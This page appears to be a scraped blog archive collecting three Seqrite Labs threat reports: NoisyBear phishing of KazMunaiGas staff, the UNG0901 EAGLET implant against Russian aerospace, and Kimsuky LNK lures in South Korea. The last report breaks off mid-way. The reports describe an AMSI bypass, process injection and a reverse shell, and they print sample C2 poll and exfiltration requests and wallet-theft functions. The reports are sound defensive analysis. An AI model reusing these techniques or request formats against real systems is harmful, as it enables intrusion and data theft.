برچسب: Targets

NoisyBear Targets Kazakhstan Oil & Gas

Introduction
Key Targets
- Industries Affected.
- Geographical Focus.
Infection Chain.
Initial Findings
- Looking into the malicious email.
- Looking into the decoy-document.
Technical Analysis
- Stage 0 – Malicious ZIP & LNK files.
- Stage 1 – Malicious BATCH scripts.
- Stage 2 – Malicious DOWNSHELL loaders.
- Stage 3 – Malicious DLL implant.
Infrastructure and Hunting.
Attribution
Conclusion
Seqrite Protection.
IOCs
MITRE ATT&CK.

Authors: Subhajeet Singha & Sathwik Ram Prakki

Introduction

Seqrite Labs APT-Team has been tracking and uncovered a supposedly new threat group since April 2025, that we track by the name Noisy Bear as Noisy Bear. This threat group has targeted entities in Central Asia, such as targeting the Oil and Gas or energy sector of Kazakhstan. The campaign is targeted towards employees of KazMunaiGas or KMG where the threat entity delivered a fake document related to KMG IT department, mimicking official internal communication and leveraging themes such as policy updates, internal certification procedures, and salary adjustments.

In this blog, we will explore the in-depth technical details of the campaign, we encountered during our analysis. We will examine the various stages of this campaign, where infection starts with a phishing email having a ZIP attachment, which contains a malicious LNK downloader along with a decoy, which further downloads a malicious BATCH script, leading to PowerShell loaders, which we dubbed as DOWNSHELL reflectively loading a malicious DLL implant. We will also look into the infrastructure covering the entire campaign.

Key Targets

Industries Affected.

Energy Sector [Oil and Gas]

Geographical Focus.

Infection Chain

Initial Findings

Initially, we have been tracking this threat actor since April 2025, and we observed that this threat entity launched a campaign against KazMunaiGas employees in May 2025 using a spear-phishing-oriented method. A compromised business email was used to deliver a malicious ZIP file, which contained a decoy along with a malicious initial infection-based shortcut (.LNK) file known as График зарплат.lnk, which can be translated to Salary Schedule.lnk. The sample initially surfaced on Virus Total in the first half of May 2025.

Now, let us look into the malicious email and decoy file.

Looking into the malicious email.

Initially, looking into the email file’s sender, we found that the threat actor used a compromised business email of an individual working in Finance Department of KazMunaiGas, using the email and an urgent prioritized subject URGENT! Review the updated salary schedule, they emailed it to the employees of KMG.

Later, upon looking at the contents of the email, it became clear that the message was mostly crafted to look like an internal HR communication related to salary-oriented discussion or decision. The message basically says about reviewing an updated information about lot of things such as work schedules, salaries and incentives related policies and decisions. The TA also instructs the targets of KMG to check for a file known as График.zip translated to Schedule.zip and then to open a file known as График зарплат which translates to Salary Schedule , which is basically the shortcut (LNK) file to be executed to download further stagers.

Well, last but not the least, the email also mentions to complete the instructions by 15th May 2025 enhancing a sense of urgency. Now, let us go ahead and analyze the decoy file.

Looking into the decoy-document.

Looking into the decoy document, we can see that it has an official logo of the targeted entity I.e., KazMunaiGas, along with instructions in both Russian and Kazakh language which instructs the employees through a series of simple steps which is to open the Downloads folder in the browser, extract a ZIP archive named KazMunayGaz_Viewer.zip, and run a file called KazMunayGaz_Viewer, although the file-name is irrelevant, but we believe, this is the exact file dropped from the malicious email. The decoy also mentions users to wait for a console window to appear and specifically advised them not to close or interact with it, to limit suspicion on targets’ ends. Last, not the least, it also mentions the IT-Support team in salutations to make it look completely legitimate, with above artefacts present in the decoy.

Technical Analysis.

We have divided the technical analysis into four parts, where initially we will look into the malicious ZIP containing the LNK file, which further downloads the malicious Batch script, and going ahead with downloading the script-based loader followed by the malicious DLL.

Stage 0 – Malicious ZIP & LNK Files.

Initially, looking into the ZIP file, we found three files, out of which one of them stands to be the decoy document, which we saw initially, the second one turns out to be README.txt, which once again makes sure that the instructions are present, so that it does not seem suspicious and the later one turns out to be malicious LNK file.

Now, upon looking into the malicious shortcut(.LNK) file, named as График зарплат , we found that is using powershell.exe LOLBIN to execute a downloader-based behavior.

It downloads a malicious batch script known as 123.bat, from a remote-server, which is hxxps[://]77[.]239[.]125[.]41[:]8443 and once it is downloaded, it stores the batch script under the path C:\Users\Public, it then executes the batch script using the Start-Process cmdlet from the path.

Similarly, hunting for similar LNK file, we found another LNK, which belongs to the same campaign, looks slightly different.

This malicious LNK file, uses a little operand shenanigan to avoid static signature detection, but concatenation of the string literals and further downloading a batch script from the same remote server, saving it to the Public folder, further executing it via cmdlet.

In, the next section, we will examine the malicious BATCH scripts.

Stage 1 – Malicious BATCH Scripts.

Now, looking into the one of the BATCH scripts, I.e., it.bat , we can see that it is downloading PowerShell Loaders, which we have dubbed as DOWNSHELL, from a remote server known as support.ps1 and a.ps1, once they are downloaded, it then sleeps for a total of 11 seconds.

Now, looking into the second batch script I.e., the 123.bat file, it also does the same which is downloading the PowerShell loaders, followed by a sleep of 10 seconds.

In the next section, we will move ahead to understanding the working of the DOWNSHELL loaders written in PowerShell.

Stage 2 – Malicious DOWNSHELL Loaders.

In, this section we will look into the set of malicious PowerShell scripts, which we have dubbed as DOWNSHELL, the first PowerShell file, also known as support.ps1 is basically a script which is responsible for impairing defense on the target machine and the latter is responsible for performing loader-oriented function.

Looking into the code, we figured out that the script is basically obfuscating, the target namespace by building “System.Management.Automation” via string concatenation, then enumerates all loaded .NET assemblies in the current AppDomain and filters for the one whose FullName matches that namespace.

Then, using reflection technique, it resolves the internal type System.Management.Automation.AmsiUtils, which basically retrieves the private static field amsiInitiFailed, so changing or flipping this flag convinces PowerShell that the AMSI has failed to initialize, so the other malicious script belonging to DOWNSHELL family, does not get scanned and executes without any hassle or interruption. Now, let us look into the second PowerShell script.

Looking into the first part of the code, it looks like a copied version of the famous red-team emulation-based tool known as PowerSploit, the function LookUpFunc basically dynamically retrieves the memory address of any exported function from a specified DLL without using traditional DllImport or Add-Type calls. It performs this by locating the Microsoft.Win32.UnsafeNativeMethods type within the already-loaded System.dll assembly, then extracting and invoking the hidden .NET wrappers for GetModuleHandle and GetProcAddress. By first resolving the base address of the target module ($moduleName) and then passing it along with the target function name ($functionName), it returns a raw function pointer to that API, which is required.

Then, looking into the second part of the code, the function getDelegateType basically creates a custom .NET delegate on the fly, entirely in memory. It takes the parameter types and returns certain type, builds a new delegate class with those, and gives it an Invoke method so it can be used like a normal function. This lets the entire script wrap the raw function pointers (from LookupFunc) into something PowerShell can call directly, making it easy to run WinAPI functions without having to import them in the usual way, followed by querying the process ID of the explorer.exe process and storing it inside a variable.

The latter part of the script is followed by a byte array containing the meterpreter reverse_tcpshellcode, which is basically using classical Create-RemoteThread Injection technique using OpenProcess, VirtualAllocEx, WriteProcessMemory & CreateRemoteThread to inject the shellcode inside the target process which is explorer.exe , followed by a message Injected! Check your listener!.

Well, an interesting part of this script is some part of this is commented, which performs Reflective DLL injection into remote process, which is notepad in this case, using a tool known as PowerSploit , hosted at the remote server, which is downloaded, and the Meterpreter based DLL is being used. Another slight interesting case are the comments in Russian Language. In the next case, we will examine the DLL.

Stage 3 – Malicious DLL Implant.

Initially, we did check out the DLL implant, in a PE-analysis tool, and it was confirmed that the DLL implant or shellcode loader is a 64-bit binary.

Next, moving ahead with the code, we saw that the implant is using Semaphores as a sort of gatekeeper to make sure only one copy of itself runs at a time, in this case the implant uses a named object Local\doSZQmSnP12lu4Pb5FRD. When it starts, it tries to create this semaphore then if it already exists, that means another instance is active. To double-check, it uses WaitForSingleObject on the semaphore and then looks for a specific named event. If the event exists, it knows another instance has already completed its setup. If it doesn’t, it creates the event itself.

Now, depending on the previous function, which is responsible for checking the number of instances, the next step is it spawns a rundll32.exe process in a suspended manner.

After creating the process in a suspended state, the implant performs classic thread-context hijacking: it calls GetThreadContext on the primary thread, uses VirtualAllocEx to reserve RWX memory in the target, WriteProcessMemory to drop the shellcode, updates the thread’s RIP to point to that buffer via SetThreadContext, and finally calls ResumeThread so execution continues at the injected shellcode. In this case, the shellcode basically is a reverse shell.

Infrastructure & Hunting.

Upon looking into the infrastructure, the threat entity had been using, we found a few slightly interesting details about it.

Tool-Arsenal

Along, with the tools, which we saw had been used by the threat actor, we also found that there are more open-source red-team oriented tools, which had been hosted by the threat actor for further usage.

Pivoting

Using similar fingerprint, we hunted a similar infrastructure, which belongs to the similar threat actor.

One of most interesting part, being both the infrastructure is hosted under a sanctioned hosting firm known as Aeza Group LLC.

Another interesting part is, we also discovered a lot of suspicious web applications being hosted, related to wellness, fitness and health assistance for Russian individuals.

Attribution.

Attribution is a very important metric when describing a threat entity. It involved analyzing and correlating various domains, which include Tactics, Techniques and Procedures (TTPs), operational mistakes, rotation and re-use of similar infrastructural artefacts, operational mistakes which could lead to attribution and much more.

In our ongoing tracking of Noisy Bear, we have a lot of artefacts, such as languages present inside the tooling, usage of sanctioned web-hosting services and similar behavioral artefacts with related to Russian threat entities which have previously targeted similar Central Asian nations, we attribute the threat actor possibly could be of Russian origin.

Conclusion.

We have found that a threat entity, dubbed as NoisyBear is targeting Kazakh Energy Sector using company specific lure while heavily depending on PowerShell and open-source post-exploitation tools such as Metasploit, hosting them over a sanctioned web-hosting provider, we can also conclude that the threat actor has been active since the month of April 2025.

SEQRITE Protection.

TBD.

IOCs

File-Type	SHA-256
Outlook	5168a1e22ee969db7cea0d3e9eb64db4a0c648eee43da8bacf4c7126f58f0386
ZIP	021b3d53fe113d014a9700488e31a6fb5e16cb02227de5309f6f93affa4515a6
ZIP	f5e7dc5149c453b98d05b73cad7ac1c42b381f72b6f7203546c789f4e750eb26
LNK	a40e7eb0cb176d2278c4ab02c4657f9034573ac83cee4cde38096028f243119c
LNK	26f009351f4c645ad4df3c1708f74ae2e5f8d22f3b0bbb4568347a2a72651bee
Batch Script	d48aeb6afcc5a3834b3e4ca9e0672b61f9d945dd41046c9aaf782382a6044f97
Batch Script	1eecfc1c607be3891e955846c7da70b0109db9f9fdf01de45916d3727bff96e0
PowerShell	da98b0cbcd784879ba38503946898d747ade08ace1d4f38d0fb966703e078bbf
PowerShell	6d6006eb2baa75712bfe867bf5e4f09288a7d860a4623a4176338993b9ddfb4b
PowerShell	fb0f7c35a58a02473f26aabea4f682e2e483db84b606db2eca36aa6c7e7d9cf8
DLL	1bfe65acbb9e509f80efcfe04b23daf31381e8b95a98112b81c9a080bdd65a2d
Domains/IPs
77[.]239[.]125[.]41
wellfitplan[.]ru
178[.]159[.]94[.]8

MITRE ATT&CK

Tactic	Technique ID	Name
Reconnaissance	T1589.002	Gather Victim Identity Information: Email Addresses
Initial Access	T1204.002 T1078.002	User Execution: Malicious File Valid Accounts: Domain Accounts
Execution	T1059.001 T1059.00	Command and Scripting Interpreter: PowerShell
Defense Evasion	T1562 T1027.007 T1027.013 T1055.003 T1620 T1218.011	Impair Defenses Dynamic API Resolution Encrypted/Encoded File Thread Execution Hijacking Reflective Code Loading System Binary Proxy Execution: Rundll32
Command and Control	T1105	Ingress Tool Transfer
Exfiltration	T1567.002	Exfiltration to Cloud Storage

Source link

سپتامبر 4, 2025

Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant

Introduction
Initial Findings
Infection Chain.
Technical Analysis
- Stage 0 – Malicious Email File.
- Stage 1 – Malicious LNK file.
- Stage 2 – Looking into the decoy file.
- Stage 3 – Malicious EAGLET implant.
Hunting and Infrastructure.
- Infrastructural details.
- Similar campaigns.
Attribution
Conclusion
SEQRITE Protection.
IOCs
MITRE ATT&CK.

Introduction

SEQRITE Labs APT-Team has recently found a campaign, which has been targeting Russian Aerospace Industry. The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations. The entire malware ecosystem involved in this campaign is based on usage of malicious LNK file EAGLET DLL implant, further executing malicious commands and exfiltration of data.

In this blog, we will explore the technical details of the campaign. we encountered during our analysis. We will examine the various stages of this campaign, starting from deep dive into the initial infection chain to implant used in this campaign, ending with a final overview covering the campaign.

Initial Findings

Recently, on 27th of June, our team upon hunting malicious spear-phishing attachments, found a malicious email file, which surfaced on sources like VirusTotal, upon further hunting, we also found a malicious LNK file, which was responsible for execution of the malicious DLL-attachment whose file-type has been masquerading as ZIP-attachment.

Upon looking into the email, we found the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip is basically a DLL file and upon further hunting, we found another file which is a shortcut [LNK] file, having the same name. Then, we decided to look into the workings of these files.

Infection Chain

Technical Analysis

We will break down the analysis of this campaign into three different parts, starting with looking into the malicious EML file, followed by the attachment I.e., the malicious DLL implant and the LNK file.

Stage 0 – Malicious Email File.

Well, initially, we found a malicious e-mail file, named as backup-message-10.2.2.20_9045-800282.eml , uploaded from Russian-Federation. Upon, looking into the specifics of the e-mail file.

We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), from Transport and Logistics Centre regarding a Delivery note.

Looking in the contents of the email, we found that the message was crafted to deliver the news of recent logistics movement, also referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), the email content also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. As, we already noticed that the threat actor impersonates an individual, we also noticed that there is a malicious attachment, masquerading as ZIP file. Upon downloading, we figured out that it was a malicious DLL implant.

Apart, from the malicious DLL implant, we also hunted a malicious LNK file, with the same name, we believe has been dropped by another spear-phishing attachment, which is used to execute this DLL implant, which we have termed as EAGLET.

In the next section, we will look into the malicious LNK file.

Stage 1 – Malicious LNK File.

Upon, looking inside the LNK file, we found that it is performing some specific set of tasks which finally executes the malicious DLL file and also spawns a decoy pop-up on the screen. It does this by following manner.

Initially, it uses powershell.exe binary to run this script in background, which enumerates the masquerading ZIP file, which is the malicious EAGLET implant, then in-case it finds the malicious implant, it executes it via rundll32.exe LOLBIN, else in-case it fails to find it recursively looks for the file under %USERPROFILE% and in-case it finds, it runs it, then, if it fails to find it in that location, it looks tries to look under %TEMP% location.

Once it has found the DLL implant, it is executed and then extracts a decoy XLS file embedded within the implant, which is performed by reading the XLS file of 59904 bytes which is stored just after the starting 296960 bytes, which is then written under %TEMP% directory with named ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file, in the next section, we will look into the decoy file.

Stage 2- Looking into the decoy file.

In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.

Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.

Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.

Overall, the decoy is basically about simulating an official Russian container inspection document—specifically, an Equipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts associated with Obltransterminal LLC. In, the next section, we will look into the EAGLET implant.

Stage 3 – Malicious EAGLET implant.

Initially, as we saw that the implant and loaded it into a PE-analysis tool, we could confirm that, this is a PE file, with the decoy being stored inside the overlay section, which we already saw previously.

Next, looking into the exports of this malicious DLL, we looked into the EntryPoint and unfortunately it did not contain anything interesting. Next, looking into the DllEntryPoint which lead us to the DllMain which did contain interesting code, related to malicious behavior.

The initial interesting function, which basically enumerates info on the target machine.

In this function, the code goes ahead and creates a unique GUID of the target, which will be used to identify the victim, every time the implant is executed a new GUID is generated, this mimics the behavior of session-id which aids the operator or the threat actor to gain clarity on the target.

Then, it enumerates the computer-name of the target machine along with the hostname and DNS domain name of the target machine. Once it has received it, then it goes ahead and creates a directory known as MicrosoftApppStore under the ProgramData location.

Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.

Next, we can see that the implant is using certain Windows networking APIs such as WinHttpOpen to initiate a HTTP session, masquerading under an uncommon looking user-agent string MicrosoftAppStore/2001.0, which then is followed by another API known as WinHtppConnect which tries to connect to the hardcoded command-and-control[C2] server which is 185.225.17.104 over port 80, in case it fails, it keeps on retrying.

In, case the implants connect to the C2, it forms a URL path which us used to send a GET request to the C2 infrastructure. The entire request body looks something like this:

GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1Host: 185.225.17.104

After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain instructions.

Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.

Another feature is the download feature, in this implant, which either downloads malicious content from the server or exfiltrating required or interesting files from the target machine. One feature downloads malicious content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As, the C2 is currently down, while this research is being published, the files which had or have been used could not be discovered.

Later, another functionality irrelevant to this download feature also became quite evident that the implant is basically exfiltrating files from the target machine. The request body looks something like this:

POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

Therefore, the features are as follows.

Feature	Trigger Keyword	Behavior	Purpose
Command Execution	cmd:	Executes a shell command received from the C2 server and captures the output	Remote Code Execution
File Download	download:	Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\	Payload Staging
Exfiltration	(automatic)	Sends back the result of command execution or download status to the C2 server via HTTP POST	Data Exfiltration

That sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.

Hunting and Infrastructure

Infrastructural details

In this section, we will look into the infrastructure related artefacts. Initially, the C2, which we found to be 185[.]225[.]17[.]104, which is responsible for connecting to the EAGLET implant. The C2 server is located in Romania under the ASN 39798 of MivoCloud SRL.

Well, looking into it, we found that a lot of passive DNS records were pointing to historical infrastructure previously associated with the same threat cluster which links to TA505, which have been researched by researchers at BinaryDefense. The DNS records although suggest that similar or recycled infrastructure have been used in this campaign. Also, apart from the infrastructural co-relations with TA505 only in terms of using recycled domains, we also saw some other dodgy domains pointing have DNS records pointing towards this same infrastructure. With high-confidence, we can assure that, the current campaign has no-correlation with TA505, apart from the afore-mentioned information.

Similar, to the campaign, targeting Aerospace sector, we have also found another campaign, which is targeting Russian Military sector through recruitment themed documents. We found in that campaign, the threat actor used EAGLET implant which connects to the C2, I.e., 188[.]127[.]254[.]44 which is located in Russian under the ASN 56694, belonging to LLC Smart Ape organization.

Similar Campaigns

Campaign 1 – Military Themed Targeting

Initially, we saw the URL body, and many other behavioral artefacts of the implant, which led us to another set of campaigns, with exactly similar implant, used to target Russian Military Recruitment.

This decoy was extracted from an EAGLET implant which is named as Договор_РН83_изменения.zip which translates to Contract_RN83_Changes , which has been targeting individuals and entities related to Russian Military recruitment. As, we can see that the decoy highlights multiple advantages of serving which includes house-mortgage to pension and many more advantages.

Campaign 2 – EAGLET implant with no decoy embedded

As, in the previous campaigns we saw that occasionally, the threat entity drops a malicious LNK, which executes the DLL implant and extracts the decoy present inside the implant’s overlay section, but in this, we also saw an implant, with no such decoy present inside.

Along, with these, we also saw multiple overlaps of these campaigns having similar target-interests and implant code overlap with the threat entity known as Head Mare which have been targeting Russian speaking entities initially discovered by researchers at Kaspersky.

Attribution

Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

In our ongoing tracking on UNG0901, we discovered notable similarities and overlaps with threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

Key Overlaps Between UNG0901 and Head Mare

Tooling Arsenal:

Researchers at Kaspersky observed that Head Mare often uses a Golang based backdoor known as PhantomDL, which is often packed using software packer such as UPX, which have very simple yet functional features such as shell , download , upload , exit. Similarly, UNG0901 has also deployed EAGLET implant, which shows similar behavior and has nearly to very similar features such as shell, download, upload etc. which is programmed in C++.

File-Naming technique:

Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523, similarly in the campaigns which we witnessed by UNG0901, there were filenames with similar style such as Contract_RN83_Changes. And many more file-naming schemes which we found to be similar.

Motivation:

Head Mare has been targeting important entities related to Russia, whereas UNG0901 has also targeted multiple important entities belonging to Russia.

Apart from these, there are much additional and strong similarities which reinforce the connection between these two threat entities; therefore, we attribute UNG0901 threat entity shares resources and many other similarities with Head Mare, targeting Russian governmental & non-governmental entities.

Conclusion

UNG0901 or Unknown-Group-901 demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare which shows multiple similarities such as decoy-nomenclature and much more.

SEQRITE Protection

IOCs

File-Type	FileName	SHA-256
LNK	Договор_РН83_изменения.pdf.lnk	a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
	Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk	4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
DLL	Договор_РН83_изменения.zip	204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
	Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip	01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
	N/A	b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
	Договор_РН83_изменения.zip	413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
Decoy[XLS/ PDF]	temp.pdf	02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
	sample_extracted.xls	f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
	80650000	3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
	sample_extracted.xls	c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
	sample_extracted.xls	44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
	sample_extracted.xls	e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
	sample_extracted.xls	a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
Email-File	backup-message-10.2.2.20_9045-800282.eml	ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

MITRE ATT&CK

Tactic	Technique	ID	Details
Initial Access	Spearphishing Attachment	T1566.001	Malicious .EML file sent to VASO employee, impersonating a logistics center with TTN document lure.
Execution	System Binary Proxy Execution: Rundll32	T1218.011	DLL implant executed via trusted rundll32.exe LOLBIN, called from the .LNK file.
	PowerShell	T1059.001	Used for locating and launching the DLL implant from multiple fallback directories.
Persistence	Implant in ZIP-disguised DLL	[Custom]	DLL masquerades as .ZIP file — persistence implied via operator-controlled executions.
Defense Evasion	Masquerading	T1036	Implant disguised as ZIP, decoy XLS used to simulate sanctioned logistics paperwork.
Discovery	System Information Discovery	T1082	Gathers hostname, computer name, domain; creates victim GUID to identify target.
	Domain Trust Discovery	T1482	Enumerates victim’s DNS domain for network profiling.
Command & Control	Application Layer Protocol: HTTP	T1071.001	Communicates with C2 via HTTP; uses MicrosoftAppStore/2001.0 User-Agent.
Collection	Data from Local System	T1005	Exfiltrates system details and file contents as per threat actor’s command triggers.
Exfiltration	Exfiltration Over C2 Channel	T1041	POST requests to /result endpoint on C2 with encoded command results or exfiltrated data.
Impact	Data Exfiltration	T1537	Targeted data theft from Russian aerospace sector.

Authors:

Subhajeet Singha

Sathwik Ram Prakki

Source link

جولای 23, 2025

Kimsuky APT Targets South Korea with Deceptive PDF Lures

Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics

Contents

Introduction
Infection Chain
Initial Findings
Campaign 1
- Looking into PDF document.
Campaign 2
- Looking into PDF document.
Technical Analysis
Conclusion
Seqrite Protection
MITRE ATT&CK
IOCs

Introduction:

Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.

In this blog, we will delve into the technical details of the campaigns uncovered during our analysis. We will examine the various stages of infection, starting with a phishing email containing an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script, After de-obfuscating the script, we found that it was responsible for dropping two additional files: One Pdf file and One ZIP file The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.

Infection Chain:

Initial Findings:

Campaign-1:

In the first campaign, we identified a document related to tax reduction and tax payment related to revenue, which contained the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.

Based on our initial findings, we discovered that the adversary utilized a different document containing the same LNK file content.

Campaign-2:

In campaign-2, it has come to our attention that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centers, kindergartens, and various local administrative offices, including township and village authorities, as well as neighbourhood community centres. However, hackers, including cyber-criminals, are exploiting this dissemination process by sending deceptive emails containing harmful attachments. These emails are targeting residential recipients and key personnel at local offices.

Fig .3 Sex Offender Personal Information Notification.pdf

The adversaries have exploited the distribution of this information and document by circulating it via email, disguised under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). This attachment contains a malicious LNK file, which poses a cybersecurity threat to the recipients.

Technical Analysis and Methodology:

Campaign 1 & 2:

We have downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign-1 and “성범죄자 신상정보 고지.pdf.lnk” from campaign-2 (Sex Offender Personal Information Notification.pdf.lnk) that was shared via email. During the analysis of this LNK file, it appears to be fetching additional files from an external C2 server, as shown in the snapshot below.

Fig.4 Downloading VBScript from C2 (Campaign –1)

Fig .5 Downloading VBScript From C2 (Campaign -2)

The file was downloaded from the URL provided above and saved into the Temp folder, as indicated below.

Fig .6 downloaded into Temp Folder (Campaign-1)

Fig .7 downloaded into Temp Folder (Campaign-2)

The file downloaded from the C2 server appears to be an obfuscated VBScript. Upon DE obfuscating the script, we discovered two additional files: one PDF and one ZIP file.

The first section of the file is encoded in Base64 strings.

After Decoding we have found one PDF file.

The second part of the VBScript is also encoded in Base64. After decoding it, we discovered a ZIP file.

Zip files contain the below numbers of files in it.

Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files house obfuscated data, which, upon further dissection, may yield critical intelligence regarding the malware’s functionality and objectives. The following figures illustrate the encoded content of the two text files, which will be subsequently decoded and analysed to elucidate the next phase in the attack chain.

Fig. 14- 1 Log.txt file with Base64 encoding

Fig.15 – 2 Log .txt file with Base64 encoding

The 1.vbs file employs advanced obfuscation techniques, utilizing the chr() and CLng() functions to dynamically construct characters and invoke commands at runtime. This strategy effectively circumvents signature-based detection mechanisms, allowing the script to evade detection during execution.

Upon script termination, the concatenated characters form a complete command, which is subsequently executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.

Upon attempting to DE-obfuscate the VBScript, we uncovered the following command-line execution, which subsequently triggers the PowerShell script for further processing.

Upon executing the 1.vbs file, it triggered the invocation of the 1.ps1 file, as illustrated in the snapshot below.

The 1.ps1 script includes a function designed to decode Base64-encoded data from the 1.log file and execute the resulting script.

The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is subsequently used to create a dedicated directory within the system’s temporary folder, ensuring that attack-related files are stored in a location specific to the compromised machine, as shown in above snapshot.

As a VM-aware sample, the script checks if it is executing within a virtual machine environment. If it detects a virtual machine, it will delete all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.

The script encompasses 11 functions that define the subsequent phases of the malware’s operation, which include data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.

List of malicious function retrieved from 1 log file:

UploadFile ():

The upload function exfiltrates data by transmitting it to the server in 1MB chunks, allowing it to handle large file sizes efficiently. The script awaits a response from the server, and if it receives an HTTP status code of “200,” it proceeds with further execution. If the response differs, the script terminates its operation. Each chunk is sent via an HTTP POST request, with the function verifying the success of each upload iteration before continuing.

GetExWFile ():

The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the associated”.ldb” and ”.log” files linked to those extensions for exfiltration. These files are subsequently transferred to the specified destination folder, as indicated by the $Storepath variable.

GetBrowserData ():

The script checks whether any of the following browsers—Edge, Firefox, Chrome, or Naver Whale—are actively running, to extract user profile data, including cookies, login credentials, bookmarks, and web data. Prior to collecting this information, the script terminates the browser processes to ensure uninterrupted access. It then proceeds to retrieve data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.

Download file () :

The download file function downloads any file based on the C2 command.

RegisterTask () :

It creates persistence for the files “1.log” and “1.vbs”.

Fig.25 RegisterTask()

Send ():

The send () function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.

